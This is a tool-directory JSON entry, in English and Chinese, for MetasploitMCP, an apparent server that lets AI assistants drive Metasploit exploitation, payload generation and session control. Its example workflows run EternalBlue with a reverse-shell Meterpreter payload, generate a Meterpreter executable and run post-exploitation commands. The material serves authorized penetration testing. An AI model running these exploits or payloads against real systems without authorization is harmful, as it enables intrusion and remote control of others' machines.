[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"similar-GH05TCREW--MetasploitMCP":3,"tool-GH05TCREW--MetasploitMCP":64},[4,17,27,35,48,56],{"id":5,"name":6,"github_repo":7,"description_zh":8,"stars":9,"difficulty_score":10,"last_commit_at":11,"category_tags":12,"status":16},3808,"stable-diffusion-webui","AUTOMATIC1111\u002Fstable-diffusion-webui","stable-diffusion-webui 是一个基于 Gradio 构建的网页版操作界面，旨在让用户能够轻松地在本地运行和使用强大的 Stable Diffusion 图像生成模型。它解决了原始模型依赖命令行、操作门槛高且功能分散的痛点，将复杂的 AI 绘图流程整合进一个直观易用的图形化平台。\n\n无论是希望快速上手的普通创作者、需要精细控制画面细节的设计师，还是想要深入探索模型潜力的开发者与研究人员，都能从中获益。其核心亮点在于极高的功能丰富度：不仅支持文生图、图生图、局部重绘（Inpainting）和外绘（Outpainting）等基础模式，还独创了注意力机制调整、提示词矩阵、负向提示词以及“高清修复”等高级功能。此外，它内置了 GFPGAN 和 CodeFormer 等人脸修复工具，支持多种神经网络放大算法，并允许用户通过插件系统无限扩展能力。即使是显存有限的设备，stable-diffusion-webui 也提供了相应的优化选项，让高质量的 AI 艺术创作变得触手可及。",162132,3,"2026-04-05T11:01:52",[13,14,15],"开发框架","图像","Agent","ready",{"id":18,"name":19,"github_repo":20,"description_zh":21,"stars":22,"difficulty_score":23,"last_commit_at":24,"category_tags":25,"status":16},1381,"everything-claude-code","affaan-m\u002Feverything-claude-code","everything-claude-code 是一套专为 AI 编程助手（如 Claude Code、Codex、Cursor 等）打造的高性能优化系统。它不仅仅是一组配置文件，而是一个经过长期实战打磨的完整框架，旨在解决 AI 代理在实际开发中面临的效率低下、记忆丢失、安全隐患及缺乏持续学习能力等核心痛点。\n\n通过引入技能模块化、直觉增强、记忆持久化机制以及内置的安全扫描功能，everything-claude-code 能显著提升 AI 在复杂任务中的表现，帮助开发者构建更稳定、更智能的生产级 AI 代理。其独特的“研究优先”开发理念和针对 Token 消耗的优化策略，使得模型响应更快、成本更低，同时有效防御潜在的攻击向量。\n\n这套工具特别适合软件开发者、AI 研究人员以及希望深度定制 AI 工作流的技术团队使用。无论您是在构建大型代码库，还是需要 AI 协助进行安全审计与自动化测试，everything-claude-code 都能提供强大的底层支持。作为一个曾荣获 Anthropic 黑客大奖的开源项目，它融合了多语言支持与丰富的实战钩子（hooks），让 AI 真正成长为懂上",138956,2,"2026-04-05T11:33:21",[13,15,26],"语言模型",{"id":28,"name":29,"github_repo":30,"description_zh":31,"stars":32,"difficulty_score":23,"last_commit_at":33,"category_tags":34,"status":16},2271,"ComfyUI","Comfy-Org\u002FComfyUI","ComfyUI 是一款功能强大且高度模块化的视觉 AI 引擎，专为设计和执行复杂的 Stable Diffusion 图像生成流程而打造。它摒弃了传统的代码编写模式，采用直观的节点式流程图界面，让用户通过连接不同的功能模块即可构建个性化的生成管线。\n\n这一设计巧妙解决了高级 AI 绘图工作流配置复杂、灵活性不足的痛点。用户无需具备编程背景，也能自由组合模型、调整参数并实时预览效果，轻松实现从基础文生图到多步骤高清修复等各类复杂任务。ComfyUI 拥有极佳的兼容性，不仅支持 Windows、macOS 和 Linux 全平台，还广泛适配 NVIDIA、AMD、Intel 及苹果 Silicon 等多种硬件架构，并率先支持 SDXL、Flux、SD3 等前沿模型。\n\n无论是希望深入探索算法潜力的研究人员和开发者，还是追求极致创作自由度的设计师与资深 AI 绘画爱好者，ComfyUI 都能提供强大的支持。其独特的模块化架构允许社区不断扩展新功能，使其成为当前最灵活、生态最丰富的开源扩散模型工具之一，帮助用户将创意高效转化为现实。",107662,"2026-04-03T11:11:01",[13,14,15],{"id":36,"name":37,"github_repo":38,"description_zh":39,"stars":40,"difficulty_score":23,"last_commit_at":41,"category_tags":42,"status":16},2268,"ML-For-Beginners","microsoft\u002FML-For-Beginners","ML-For-Beginners 是由微软推出的一套系统化机器学习入门课程，旨在帮助零基础用户轻松掌握经典机器学习知识。这套课程将学习路径规划为 12 周，包含 26 节精炼课程和 52 道配套测验，内容涵盖从基础概念到实际应用的完整流程，有效解决了初学者面对庞大知识体系时无从下手、缺乏结构化指导的痛点。\n\n无论是希望转型的开发者、需要补充算法背景的研究人员，还是对人工智能充满好奇的普通爱好者，都能从中受益。课程不仅提供了清晰的理论讲解，还强调动手实践，让用户在循序渐进中建立扎实的技能基础。其独特的亮点在于强大的多语言支持，通过自动化机制提供了包括简体中文在内的 50 多种语言版本，极大地降低了全球不同背景用户的学习门槛。此外，项目采用开源协作模式，社区活跃且内容持续更新，确保学习者能获取前沿且准确的技术资讯。如果你正寻找一条清晰、友好且专业的机器学习入门之路，ML-For-Beginners 将是理想的起点。",84991,"2026-04-05T10:45:23",[14,43,44,45,15,46,26,13,47],"数据工具","视频","插件","其他","音频",{"id":49,"name":50,"github_repo":51,"description_zh":52,"stars":53,"difficulty_score":10,"last_commit_at":54,"category_tags":55,"status":16},3128,"ragflow","infiniflow\u002Fragflow","RAGFlow 是一款领先的开源检索增强生成（RAG）引擎，旨在为大语言模型构建更精准、可靠的上下文层。它巧妙地将前沿的 RAG 技术与智能体（Agent）能力相结合，不仅支持从各类文档中高效提取知识，还能让模型基于这些知识进行逻辑推理和任务执行。\n\n在大模型应用中，幻觉问题和知识滞后是常见痛点。RAGFlow 通过深度解析复杂文档结构（如表格、图表及混合排版），显著提升了信息检索的准确度，从而有效减少模型“胡编乱造”的现象，确保回答既有据可依又具备时效性。其内置的智能体机制更进一步，使系统不仅能回答问题，还能自主规划步骤解决复杂问题。\n\n这款工具特别适合开发者、企业技术团队以及 AI 研究人员使用。无论是希望快速搭建私有知识库问答系统，还是致力于探索大模型在垂直领域落地的创新者，都能从中受益。RAGFlow 提供了可视化的工作流编排界面和灵活的 API 接口，既降低了非算法背景用户的上手门槛，也满足了专业开发者对系统深度定制的需求。作为基于 Apache 2.0 协议开源的项目，它正成为连接通用大模型与行业专有知识之间的重要桥梁。",77062,"2026-04-04T04:44:48",[15,14,13,26,46],{"id":57,"name":58,"github_repo":59,"description_zh":60,"stars":61,"difficulty_score":10,"last_commit_at":62,"category_tags":63,"status":16},2181,"OpenHands","OpenHands\u002FOpenHands","OpenHands 是一个专注于 AI 驱动开发的开源平台，旨在让智能体（Agent）像人类开发者一样理解、编写和调试代码。它解决了传统编程中重复性劳动多、环境配置复杂以及人机协作效率低等痛点，通过自动化流程显著提升开发速度。\n\n无论是希望提升编码效率的软件工程师、探索智能体技术的研究人员，还是需要快速原型验证的技术团队，都能从中受益。OpenHands 提供了灵活多样的使用方式：既可以通过命令行（CLI）或本地图形界面在个人电脑上轻松上手，体验类似 Devin 的流畅交互；也能利用其强大的 Python SDK 自定义智能体逻辑，甚至在云端大规模部署上千个智能体并行工作。\n\n其核心技术亮点在于模块化的软件智能体 SDK，这不仅构成了平台的引擎，还支持高度可组合的开发模式。此外，OpenHands 在 SWE-bench 基准测试中取得了 77.6% 的优异成绩，证明了其解决真实世界软件工程问题的能力。平台还具备完善的企业级功能，支持与 Slack、Jira 等工具集成，并提供细粒度的权限管理，适合从个人开发者到大型企业的各类用户场景。",70612,"2026-04-05T11:12:22",[26,15,13,45],{"id":65,"github_repo":66,"name":67,"description_en":68,"description_zh":69,"ai_summary_zh":69,"readme_en":70,"readme_zh":71,"quickstart_zh":72,"use_case_zh":73,"hero_image_url":74,"owner_login":75,"owner_name":76,"owner_avatar_url":77,"owner_bio":78,"owner_company":78,"owner_location":78,"owner_email":78,"owner_twitter":78,"owner_website":78,"owner_url":79,"languages":80,"stars":89,"forks":90,"last_commit_at":91,"license":92,"difficulty_score":93,"env_os":94,"env_gpu":95,"env_ram":95,"env_deps":96,"category_tags":103,"github_topics":78,"view_count":23,"oss_zip_url":78,"oss_zip_packed_at":78,"status":16,"created_at":104,"updated_at":105,"faqs":106,"releases":135},3208,"GH05TCREW\u002FMetasploitMCP","MetasploitMCP","MCP Server for Metasploit","MetasploitMCP 是一座连接大型语言模型（如 Claude）与 Metasploit 渗透测试框架的智能桥梁。它通过模型上下文协议（MCP），让 AI 助手能够直接理解并执行复杂的安全测试指令，将原本需要手动输入的命令转化为自然的对话交互。\n\n这一工具主要解决了安全测试流程门槛高、操作繁琐的问题。传统渗透测试需要专业人员熟记大量模块命令和参数，而 MetasploitMCP 允许用户用通俗语言描述需求，AI 即可自动调用漏洞利用、载荷生成、会话管理及监听器控制等核心功能，大幅提升了工作流的效率与灵活性。\n\n该工具专为网络安全研究人员、渗透测试工程师及安全开发者设计。需要注意的是，由于其直接操控强大的攻击模拟功能，使用者必须具备相应的专业资质，并严格仅在获得授权的环境中进行测试。\n\n其技术亮点在于标准化的工具集成能力，不仅支持搜索漏洞和载荷模块，还能动态配置并执行攻击任务、管理后台会话及生成恶意载荷文件。同时，它灵活支持 HTTP\u002FSSE 和 STDIO 两种传输模式，既能适配本地桌面端 AI 应用，也能部署为远程服务，为构建自动化安全运营体系提供了坚实的技术基础。","# Metasploit MCP Server\n\nA Model Context Protocol (MCP) server for Metasploit Framework integration.\n\n\nhttps:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F39b19fb5-8397-4ccd-b896-d1797ec185e1\n\n\n## Description\n\nThis MCP server provides a bridge between large language models like Claude and the Metasploit Framework penetration testing platform. It allows AI assistants to dynamically access and control Metasploit functionality through standardized tools, enabling a natural language interface to complex security testing workflows.\n\n## Features\n\n### Module Information\n\n- **list_exploits**: Search and list available Metasploit exploit modules\n- **list_payloads**: Search and list available Metasploit payload modules with optional platform and architecture filtering\n\n### Exploitation Workflow\n\n- **run_exploit**: Configure and execute an exploit against a target with options to run checks first\n- **run_auxiliary_module**: Run any Metasploit auxiliary module with custom options\n- **run_post_module**: Execute post-exploitation modules against existing sessions\n\n### Payload Generation\n\n- **generate_payload**: Generate payload files using Metasploit RPC (saves files locally)\n\n### Session Management\n\n- **list_active_sessions**: Show current Metasploit sessions with detailed information\n- **send_session_command**: Run a command in an active shell or Meterpreter session\n- **terminate_session**: Forcefully end an active session\n\n### Handler Management\n\n- **list_listeners**: Show all active handlers and background jobs\n- **start_listener**: Create a new multi\u002Fhandler to receive connections\n- **stop_job**: Terminate any running job or handler\n\n## Prerequisites\n\n- Metasploit Framework installed and msfrpcd running\n- Python 3.10 or higher\n- Required Python packages (see requirements.txt)\n\n## Installation\n\n1. Clone this repository\n2. Install dependencies:\n   ```\n   pip install -r requirements.txt\n   ```\n3. Configure environment variables (optional):\n   ```\n   MSF_PASSWORD=yourpassword\n   MSF_SERVER=127.0.0.1\n   MSF_PORT=55553\n   MSF_SSL=false\n   PAYLOAD_SAVE_DIR=\u002Fpath\u002Fto\u002Fsave\u002Fpayloads  # Optional: Where to save generated payloads\n   ```\n\n## Usage\n\nStart the Metasploit RPC service:\n\n```bash\nmsfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553\n```\n\n### Transport Options\n\nThe server supports two transport methods:\n\n- **HTTP\u002FSSE (Server-Sent Events)**: Default mode for interoperability with most MCP clients\n- **STDIO (Standard Input\u002FOutput)**: Used with Claude Desktop and similar direct pipe connections\n\nYou can explicitly select the transport mode using the `--transport` flag:\n\n```bash\n# Run with HTTP\u002FSSE transport (default)\npython MetasploitMCP.py --transport http\n\n# Run with STDIO transport\npython MetasploitMCP.py --transport stdio\n```\n\nAdditional options for HTTP mode:\n```bash\npython MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085\n```\n\n### Claude Desktop Integration\n\nFor Claude Desktop integration, configure `claude_desktop_config.json`:\n\n```json\n{\n    \"mcpServers\": {\n        \"metasploit\": {\n            \"command\": \"uv\",\n            \"args\": [\n                \"--directory\",\n                \"C:\\\\path\\\\to\\\\MetasploitMCP\",\n                \"run\",\n                \"MetasploitMCP.py\",\n                \"--transport\",\n                \"stdio\"\n            ],\n            \"env\": {\n                \"MSF_PASSWORD\": \"yourpassword\"\n            }\n        }\n    }\n}\n```\n\n### Other MCP Clients\n\nFor other MCP clients that use HTTP\u002FSSE:\n\n1. Start the server in HTTP mode:\n   ```bash\n   python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085\n   ```\n\n2. Configure your MCP client to connect to:\n   - SSE endpoint: `http:\u002F\u002Fyour-server-ip:8085\u002Fsse`\n\n## Security Considerations\n\n⚠️ **IMPORTANT SECURITY WARNING**:\n\nThis tool provides direct access to Metasploit Framework capabilities, which include powerful exploitation features. Use responsibly and only in environments where you have explicit permission to perform security testing.\n\n- Always validate and review all commands before execution\n- Only run in segregated test environments or with proper authorization\n- Be aware that post-exploitation commands can result in significant system modifications\n\n## Example Workflows\n\n### Basic Exploitation\n\n1. List available exploits: `list_exploits(\"ms17_010\")`\n2. Select and run an exploit: `run_exploit(\"exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue\", {\"RHOSTS\": \"192.168.1.100\"}, \"windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\", {\"LHOST\": \"192.168.1.10\", \"LPORT\": 4444})`\n3. List sessions: `list_active_sessions()`\n4. Run commands: `send_session_command(1, \"whoami\")`\n\n### Post-Exploitation\n\n1. Run a post module: `run_post_module(\"windows\u002Fgather\u002Fenum_logged_on_users\", 1)`\n2. Send custom commands: `send_session_command(1, \"sysinfo\")`\n3. Terminate when done: `terminate_session(1)`\n\n### Handler Management\n\n1. Start a listener: `start_listener(\"windows\u002Fmeterpreter\u002Freverse_tcp\", \"192.168.1.10\", 4444)`\n2. List active handlers: `list_listeners()`\n3. Generate a payload: `generate_payload(\"windows\u002Fmeterpreter\u002Freverse_tcp\", \"exe\", {\"LHOST\": \"192.168.1.10\", \"LPORT\": 4444})`\n4. Stop a handler: `stop_job(1)`\n\n## Testing\n\nThis project includes comprehensive unit and integration tests to ensure reliability and maintainability.\n\n### Prerequisites for Testing\n\nInstall test dependencies:\n\n```bash\npip install -r requirements-test.txt\n```\n\nOr use the convenient installer:\n\n```bash\npython run_tests.py --install-deps\n# OR\nmake install-deps\n```\n\n### Running Tests\n\n#### Quick Commands\n\n```bash\n# Run all tests\npython run_tests.py --all\n# OR\nmake test\n\n# Run with coverage report\npython run_tests.py --all --coverage\n# OR\nmake coverage\n\n# Run with HTML coverage report\npython run_tests.py --all --coverage --html\n# OR\nmake coverage-html\n```\n\n#### Specific Test Suites\n\n```bash\n# Unit tests only\npython run_tests.py --unit\n# OR\nmake test-unit\n\n# Integration tests only  \npython run_tests.py --integration\n# OR\nmake test-integration\n\n# Options parsing tests\npython run_tests.py --options\n# OR\nmake test-options\n\n# Helper function tests\npython run_tests.py --helpers\n# OR\nmake test-helpers\n\n# MCP tools tests\npython run_tests.py --tools\n# OR\nmake test-tools\n```\n\n#### Test Options\n\n```bash\n# Include slow tests\npython run_tests.py --all --slow\n\n# Include network tests (requires actual network)\npython run_tests.py --all --network\n\n# Verbose output\npython run_tests.py --all --verbose\n\n# Quick test (no coverage, fail fast)\nmake quick-test\n\n# Debug mode (detailed failure info)\nmake test-debug\n```\n\n### Test Structure\n\n- **`tests\u002Ftest_options_parsing.py`**: Unit tests for the graceful options parsing functionality\n- **`tests\u002Ftest_helpers.py`**: Unit tests for internal helper functions and MSF client management\n- **`tests\u002Ftest_tools_integration.py`**: Integration tests for all MCP tools with mocked Metasploit backend\n- **`conftest.py`**: Shared test fixtures and configuration\n- **`pytest.ini`**: Pytest configuration with coverage settings\n\n### Test Features\n\n- **Comprehensive Mocking**: All Metasploit dependencies are mocked, so tests run without requiring an actual MSF installation\n- **Async Support**: Full async\u002Fawait testing support using pytest-asyncio\n- **Coverage Reporting**: Detailed coverage analysis with HTML reports\n- **Parametrized Tests**: Efficient testing of multiple input scenarios\n- **Fixture Management**: Reusable test fixtures for common setup scenarios\n\n### Coverage Reports\n\nAfter running tests with coverage, reports are available in:\n\n- **Terminal**: Coverage summary displayed after test run\n- **HTML**: `htmlcov\u002Findex.html` (when using `--html` option)\n\n### CI\u002FCD Integration\n\nFor continuous integration:\n\n```bash\n# CI-friendly test command\nmake ci-test\n# OR\npython run_tests.py --all --coverage --verbose\n```\n\n## Configuration Options\n\n### Payload Save Directory\n\nBy default, payloads generated with `generate_payload` are saved to a `payloads` directory in your home folder (`~\u002Fpayloads` or `C:\\Users\\YourUsername\\payloads`). You can customize this location by setting the `PAYLOAD_SAVE_DIR` environment variable.\n\n**Setting the environment variable:**\n\n- **Windows (PowerShell)**:\n  ```powershell\n  $env:PAYLOAD_SAVE_DIR = \"C:\\custom\\path\\to\\payloads\"\n  ```\n\n- **Windows (Command Prompt)**:\n  ```cmd\n  set PAYLOAD_SAVE_DIR=C:\\custom\\path\\to\\payloads\n  ```\n\n- **Linux\u002FmacOS**:\n  ```bash\n  export PAYLOAD_SAVE_DIR=\u002Fcustom\u002Fpath\u002Fto\u002Fpayloads\n  ```\n\n- **In Claude Desktop config**:\n  ```json\n  \"env\": {\n      \"MSF_PASSWORD\": \"yourpassword\",\n      \"PAYLOAD_SAVE_DIR\": \"C:\\\\your\\\\actual\\\\path\\\\to\\\\payloads\"  \u002F\u002F Only add if you want to override the default\n  }\n  ```\n\n**Note:** If you specify a custom path, make sure it exists or the application has permission to create it. If the path is invalid, payload generation might fail.\n\n## License\n\nApache 2.0\n","# Metasploit MCP 服务器\n\n用于集成 Metasploit 框架的模型上下文协议 (MCP) 服务器。\n\n\nhttps:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002F39b19fb5-8397-4ccd-b896-d1797ec185e1\n\n\n## 描述\n\n该 MCP 服务器为大型语言模型（如 Claude）与 Metasploit 框架渗透测试平台之间提供桥梁。它允许 AI 助手通过标准化工具动态访问和控制 Metasploit 的功能，从而实现对复杂安全测试工作流的自然语言接口。\n\n## 特性\n\n### 模块信息\n\n- **list_exploits**: 搜索并列出可用的 Metasploit 漏洞利用模块\n- **list_payloads**: 搜索并列出可用的 Metasploit payload 模块，并可选择按平台和架构进行过滤\n\n### 漏洞利用流程\n\n- **run_exploit**: 配置并针对目标执行漏洞利用，可选择先运行检查\n- **run_auxiliary_module**: 运行任何带有自定义选项的 Metasploit 辅助模块\n- **run_post_module**: 对现有会话执行后渗透模块\n\n### Payload 生成\n\n- **generate_payload**: 使用 Metasploit RPC 生成 payload 文件（保存到本地）\n\n### 会话管理\n\n- **list_active_sessions**: 显示当前的 Metasploit 会话及其详细信息\n- **send_session_command**: 在活动的 shell 或 Meterpreter 会话中执行命令\n- **terminate_session**: 强制结束活动会话\n\n### 处理器管理\n\n- **list_listeners**: 显示所有活动的监听器和后台作业\n- **start_listener**: 创建一个新的 multi\u002Fhandler 监听器以接收连接\n- **stop_job**: 终止任何正在运行的作业或监听器\n\n## 先决条件\n\n- 已安装 Metasploit 框架并运行 msfrpcd\n- Python 3.10 或更高版本\n- 必要的 Python 包（参见 requirements.txt）\n\n## 安装\n\n1. 克隆本仓库\n2. 安装依赖：\n   ```\n   pip install -r requirements.txt\n   ```\n3. 配置环境变量（可选）：\n   ```\n   MSF_PASSWORD=yourpassword\n   MSF_SERVER=127.0.0.1\n   MSF_PORT=55553\n   MSF_SSL=false\n   PAYLOAD_SAVE_DIR=\u002Fpath\u002Fto\u002Fsave\u002Fpayloads  # 可选：生成的 payload 保存路径\n   ```\n\n## 使用方法\n\n启动 Metasploit RPC 服务：\n\n```bash\nmsfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553\n```\n\n### 传输方式\n\n服务器支持两种传输方式：\n\n- **HTTP\u002FSSE（服务器发送事件）**：默认模式，便于与大多数 MCP 客户端互操作\n- **STDIO（标准输入\u002F输出）**：用于 Claude Desktop 等直接管道连接\n\n可通过 `--transport` 标志显式选择传输模式：\n\n```bash\n# 使用 HTTP\u002FSSE 传输（默认）\npython MetasploitMCP.py --transport http\n\n# 使用 STDIO 传输\npython MetasploitMCP.py --transport stdio\n```\n\nHTTP 模式的附加选项：\n\n```bash\npython MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085\n```\n\n### Claude Desktop 集成\n\n对于 Claude Desktop 集成，请配置 `claude_desktop_config.json`：\n\n```json\n{\n    \"mcpServers\": {\n        \"metasploit\": {\n            \"command\": \"uv\",\n            \"args\": [\n                \"--directory\",\n                \"C:\\\\path\\\\to\\\\MetasploitMCP\",\n                \"run\",\n                \"MetasploitMCP.py\",\n                \"--transport\",\n                \"stdio\"\n            ],\n            \"env\": {\n                \"MSF_PASSWORD\": \"yourpassword\"\n            }\n        }\n    }\n}\n```\n\n### 其他 MCP 客户端\n\n对于使用 HTTP\u002FSSE 的其他 MCP 客户端：\n\n1. 以 HTTP 模式启动服务器：\n   ```bash\n   python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085\n   ```\n2. 配置您的 MCP 客户端连接至：\n   - SSE 端点：`http:\u002F\u002Fyour-server-ip:8085\u002Fsse`\n\n## 安全注意事项\n\n⚠️ **重要安全警告**：\n\n该工具提供了对 Metasploit 框架功能的直接访问权限，其中包括强大的漏洞利用功能。请谨慎使用，仅在您获得明确授权的安全测试环境中使用。\n\n- 始终在执行前验证并审查所有命令\n- 仅在隔离的测试环境或获得适当授权的情况下运行\n- 请注意，后渗透命令可能导致系统发生重大修改\n\n## 示例工作流\n\n### 基本漏洞利用\n\n1. 列出可用的漏洞：`list_exploits(\"ms17_010\")`\n2. 选择并运行一个漏洞：`run_exploit(\"exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue\", {\"RHOSTS\": \"192.168.1.100\"}, \"windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp\", {\"LHOST\": \"192.168.1.10\", \"LPORT\": 4444})`\n3. 列出会话：`list_active_sessions()`\n4. 执行命令：`send_session_command(1, \"whoami\")`\n\n### 后渗透\n\n1. 运行后渗透模块：`run_post_module(\"windows\u002Fgather\u002Fenum_logged_on_users\", 1)`\n2. 发送自定义命令：`send_session_command(1, \"sysinfo\")`\n3. 完成后终止会话：`terminate_session(1)`\n\n### 处理器管理\n\n1. 启动监听器：`start_listener(\"windows\u002Fmeterpreter\u002Freverse_tcp\", \"192.168.1.10\", 4444)`\n2. 列出活动监听器：`list_listeners()`\n3. 生成 payload：`generate_payload(\"windows\u002Fmeterpreter\u002Freverse_tcp\", \"exe\", {\"LHOST\": \"192.168.1.10\", \"LPORT\": 4444})`\n4. 停止监听器：`stop_job(1)`\n\n## 测试\n\n该项目包含全面的单元测试和集成测试，以确保可靠性和可维护性。\n\n### 测试先决条件\n\n安装测试依赖：\n\n```bash\npip install -r requirements-test.txt\n```\n\n或者使用便捷的安装脚本：\n\n```bash\npython run_tests.py --install-deps\n# OR\nmake install-deps\n```\n\n### 运行测试\n\n#### 快速命令\n\n```bash\n# 运行所有测试\npython run_tests.py --all\n# OR\nmake test\n\n# 带覆盖率报告运行\npython run_tests.py --all --coverage\n# OR\nmake coverage\n\n# 带 HTML 覆盖率报告运行\npython run_tests.py --all --coverage --html\n# OR\nmake coverage-html\n```\n\n#### 特定测试套件\n\n```bash\n# 仅运行单元测试\npython run_tests.py --unit\n# OR\nmake test-unit\n\n# 仅运行集成测试  \npython run_tests.py --integration\n# OR\nmake test-integration\n\n# 选项解析测试\npython run_tests.py --options\n# OR\nmake test-options\n\n# 辅助函数测试\npython run_tests.py --helpers\n# OR\nmake test-helpers\n\n# MCP 工具测试\npython run_tests.py --tools\n# OR\nmake test-tools\n```\n\n#### 测试选项\n\n```bash\n# 包含慢速测试\npython run_tests.py --all --slow\n\n# 包含网络测试（需要实际网络）\npython run_tests.py --all --network\n\n# 详细输出\npython run_tests.py --all --verbose\n\n# 快速测试（无覆盖率，快速失败）\nmake quick-test\n\n# 调试模式（详细失败信息）\nmake test-debug\n```\n\n### 测试结构\n\n- **`tests\u002Ftest_options_parsing.py`**：优雅选项解析功能的单元测试\n- **`tests\u002Ftest_helpers.py`**：内部辅助函数和 MSF 客户端管理的单元测试\n- **`tests\u002Ftest_tools_integration.py`**：所有 MCP 工具与模拟 Metasploit 后端的集成测试\n- **`conftest.py`**：共享的测试夹具和配置\n- **`pytest.ini`**：包含覆盖率设置的 Pytest 配置\n\n### 测试特性\n\n- **全面的模拟**：所有 Metasploit 依赖项均被模拟，因此测试无需实际安装 MSF 即可运行。\n- **异步支持**：使用 pytest-asyncio 提供完整的 async\u002Fawait 测试支持。\n- **覆盖率报告**：生成详细的覆盖率分析，并以 HTML 格式呈现。\n- **参数化测试**：高效测试多种输入场景。\n- **夹具管理**：为常见设置场景提供可重用的测试夹具。\n\n### 覆盖率报告\n\n运行带覆盖率的测试后，报告可在以下位置查看：\n\n- **终端**：测试运行结束后显示覆盖率摘要。\n- **HTML**：`htmlcov\u002Findex.html`（使用 `--html` 选项时）。\n\n### CI\u002FCD 集成\n\n用于持续集成：\n\n```bash\n# 适合 CI 的测试命令\nmake ci-test\n# 或者\npython run_tests.py --all --coverage --verbose\n```\n\n## 配置选项\n\n### 有效载荷保存目录\n\n默认情况下，使用 `generate_payload` 生成的有效载荷会保存到用户主目录下的 `payloads` 目录中（例如 `~\u002Fpayloads` 或 `C:\\Users\\YourUsername\\payloads`）。您可以通过设置 `PAYLOAD_SAVE_DIR` 环境变量来自定义该路径。\n\n**设置环境变量的方法：**\n\n- **Windows (PowerShell)**：\n  ```powershell\n  $env:PAYLOAD_SAVE_DIR = \"C:\\custom\\path\\to\\payloads\"\n  ```\n\n- **Windows (命令提示符)**：\n  ```cmd\n  set PAYLOAD_SAVE_DIR=C:\\custom\\path\\to\\payloads\n  ```\n\n- **Linux\u002FmacOS**：\n  ```bash\n  export PAYLOAD_SAVE_DIR=\u002Fcustom\u002Fpath\u002Fto\u002Fpayloads\n  ```\n\n- **在 Claude Desktop 配置中**：\n  ```json\n  \"env\": {\n      \"MSF_PASSWORD\": \"yourpassword\",\n      \"PAYLOAD_SAVE_DIR\": \"C:\\\\your\\\\actual\\\\path\\\\to\\\\payloads\"  \u002F\u002F 仅当需要覆盖默认值时添加\n  }\n  ```\n\n**注意：** 如果您指定了自定义路径，请确保该路径已存在，或应用程序具有创建该路径的权限。如果路径无效，有效载荷生成可能会失败。\n\n## 许可证\n\nApache 2.0","# MetasploitMCP 快速上手指南\n\nMetasploitMCP 是一个基于模型上下文协议（MCP）的服务器，旨在连接大语言模型（如 Claude）与 Metasploit Framework 渗透测试平台。它允许 AI 助手通过自然语言接口动态调用 Metasploit 功能，执行漏洞利用、载荷生成及会话管理等安全测试任务。\n\n## 环境准备\n\n在开始之前，请确保满足以下系统要求和前置依赖：\n\n*   **操作系统**：Linux、macOS 或 Windows\n*   **Metasploit Framework**：已安装并配置好 `msfrpcd` 服务\n*   **Python 版本**：Python 3.10 或更高版本\n*   **网络权限**：确保本地回环地址（127.0.0.1）端口通信正常\n\n## 安装步骤\n\n### 1. 克隆项目\n首先从 GitHub 克隆仓库到本地：\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fyour-repo\u002FMetasploitMCP.git\ncd MetasploitMCP\n```\n\n### 2. 安装 Python 依赖\n使用 pip 安装所需库（国内用户可指定清华源加速）：\n\n```bash\npip install -r requirements.txt -i https:\u002F\u002Fpypi.tuna.tsinghua.edu.cn\u002Fsimple\n```\n\n### 3. 配置环境变量（可选）\n您可以设置以下环境变量来定制连接参数和载荷保存路径：\n\n```bash\nexport MSF_PASSWORD=yourpassword\nexport MSF_SERVER=127.0.0.1\nexport MSF_PORT=55553\nexport MSF_SSL=false\nexport PAYLOAD_SAVE_DIR=\u002Fpath\u002Fto\u002Fsave\u002Fpayloads\n```\n*(Windows PowerShell 用户使用 `$env:VAR_NAME = \"value\"` 格式)*\n\n## 基本使用\n\n### 第一步：启动 Metasploit RPC 服务\n在使用 MCP 服务器前，必须先启动 Metasploit 的 RPC 守护进程：\n\n```bash\nmsfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553\n```\n\n### 第二步：运行 MetasploitMCP 服务器\n该工具支持两种传输模式，根据您的需求选择其一：\n\n**模式 A：HTTP\u002FSSE 模式（默认，适用于大多数 MCP 客户端）**\n```bash\npython MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085\n```\n*客户端连接地址：`http:\u002F\u002Fyour-server-ip:8085\u002Fsse`*\n\n**模式 B：STDIO 模式（适用于 Claude Desktop 等直接管道连接）**\n```bash\npython MetasploitMCP.py --transport stdio\n```\n\n### 第三步：通过 AI 助手执行操作\n配置好 MCP 客户端后，您可以直接使用自然语言向 AI 助手下达指令。以下是典型的工作流示例：\n\n1.  **搜索漏洞模块**\n    > \"列出所有包含 ms17_010 的利用模块。\"\n    *(对应工具：`list_exploits`)*\n\n2.  **执行漏洞利用**\n    > \"对目标 192.168.1.100 运行 exploit\u002Fwindows\u002Fsmb\u002Fms17_010_eternalblue，使用 windows\u002Fx64\u002Fmeterpreter\u002Freverse_tcp 载荷，监听地址为 192.168.1.10:4444。\"\n    *(对应工具：`run_exploit`)*\n\n3.  **管理会话**\n    > \"显示当前活跃的会话，并在会话 1 中执行 'whoami' 命令。\"\n    *(对应工具：`list_active_sessions`, `send_session_command`)*\n\n4.  **生成 Payload**\n    > \"生成一个 windows meterpreter reverse tcp 的 exe 载荷，保存到我的下载目录。\"\n    *(对应工具：`generate_payload`)*\n\n---\n⚠️ **安全警告**：本工具提供直接的漏洞利用能力。请仅在您拥有明确授权的环境或隔离的测试网络中使用。未经授权的攻击行为是非法的。","某安全团队在对内部测试网段进行紧急漏洞验证时，需要快速评估多台服务器的风险暴露面。\n\n### 没有 MetasploitMCP 时\n- 分析师需在终端手动输入冗长的 `msfconsole` 命令查找模块，频繁切换上下文导致操作中断。\n- 编写批量测试脚本门槛高，难以根据实时扫描结果动态调整攻击载荷（Payload）参数。\n- 会话管理依赖人工监控，容易遗漏后台活跃的 Shell 连接，增加被检测风险。\n- 